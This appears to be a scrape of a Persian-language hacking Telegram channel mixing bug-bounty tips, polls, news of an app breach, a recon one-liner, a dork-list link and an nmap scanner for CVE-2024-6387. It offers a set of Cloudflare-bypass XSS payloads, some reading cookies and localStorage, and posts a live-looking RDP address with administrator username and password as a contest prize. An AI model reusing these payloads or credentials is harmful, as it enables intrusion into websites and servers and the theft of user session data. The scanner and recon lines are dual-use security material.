Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
اون دسته از دوستانی که داخل دوره شرکت کردن راضی بودن؟ (وب‌هکینگ کوروش)
Anonymous Poll
31%
+
69%
-
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
8🤯2👎1🗿1
باگ rce چیست؟

آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3
🔥 ‌ ‌ ‌ ‌ری‌اکشن فراموش نشه‌ ‌ ‌ ‌🔝
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍21
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...

دیس ایز کیبورد🤡
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3
⭕️ساعانی پیش متاسفانه گروه هکری irleak خبر از هک برنامه اتاقک داده.⭕️
🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹
بیزینس اتاقک
اجاره ویلا و هتل و ... بوده است.

🐦Twitter
💧Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4🗿4🔥2
نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟
Anonymous Poll
18%
-
82%
+
🔥5👍2💯1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟»
LazyEgg - Hunting JS Files ⭐️

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'


#BugBounty #Tips
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍1💯1
⭕️فردا مسابقه برگزار کنیم؟⭕️
Anonymous Poll
76%
+
24%
-
2🔥2👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️فردا مسابقه برگزار کنیم؟⭕️»
⭕️ ‌ ‌ ‌دوستان عزیز این ایردراپ های که تو چنل معرفی میکنم صرفا به درخواست دوستانه و سعی من بر این بوده که ایردراپی معرفی کنه که واقعا پول بده و اینکه خیلی کم من ایردراپ معرفی میکنم و از محتوای اصلی چنل خارج نمیشم.
جدیدا خیلی از چنل های تلگرامی که داخلشون جوین هستم از تست نفوذ بگیر تا باگ بانتی و معرف پیلود ها محتوای اصلی چنل رو ول کردن تمام تمرکز خودشون گذاشتن برای معرفی ایردراپ و فروش فیلترشکن اخه چرا کسی دلیلشو میدونه؟ ‌ ‌🤨😑
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🗿3
A million dorks😎
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
By entering this GitHub page, you have access to all these remote jobs, and you must use Google Hacking to use these remote jobs.

📱https://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork
Please open Telegram to view this post
VIEW IN TELEGRAM
6🤣2🔥1
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️فردا مسابقه برگزار کنیم؟⭕️
⭕️ ‌ ‌ ‌برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم.
🎁 ‌ ‌ ‌ ‌زمان مسابقه 8 شب🎁
🎺 ‌ ‌ ‌برای برگزاری مسابقه ری‌اکشن بزارید و چنل رو برای دوستاتون بقرستید🎺
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7💯3👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️ ‌ ‌ ‌برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم. 🎁 ‌ ‌ ‌ ‌زمان مسابقه 8 شب🎁 🎺 ‌ ‌ ‌برای برگزاری مسابقه ری‌اکشن بزارید و چنل رو برای دوستاتون بقرستید🎺»
⭕️ ‌ ‌ ‌صدای چنل رو باز کنید که رأس ساعت ۸ جایزه رو میزارم☠️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3
🎉🎉🎉🎉🎉🎉🎉🎉🎉🎉
89.185.85.70:3389
administrator
parsa2002@!@!

🔴هرکس برش داشت به ایدی زیر اطلاع بده یا اگر مشکلی بود.
🔤 @GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1
💀CloudFlare Payload🔪

<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>


#Payload #Cloudflare #Pentest
🔹 🔺 🔹 🔺 🔹 🔺 🔺 🔹 🔺
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥2💯2😐1
📺 یک اسکریپت bash برای nmap برای اسکن ماشین‌های آسیب‌پذیر CVE-2024-6387 با توجه به ورژن آسیب پذیر OpenSSH

nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
    if ($5 >= "8.5p1" && $5 < "9.8p1") {
        status = "Vulnerable to CVE-2024-6387"
    } else if ($5 >= "4.4p1" && $5 < "8.5p1") {
        status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
    } else if ($5 < "4.4p1") {
        status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
    }
    if (status) {
        print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
        status = ""
    }
}'


#POC #CVE_2024_6387

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥72😐2
🔥 تشریح ساده و سریع حمله SSRF

⚡️به طور واضح و ساده نحوه عملکرد و استفاده از این حفره آسیب پذیر رو بیان میکنه
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1💯1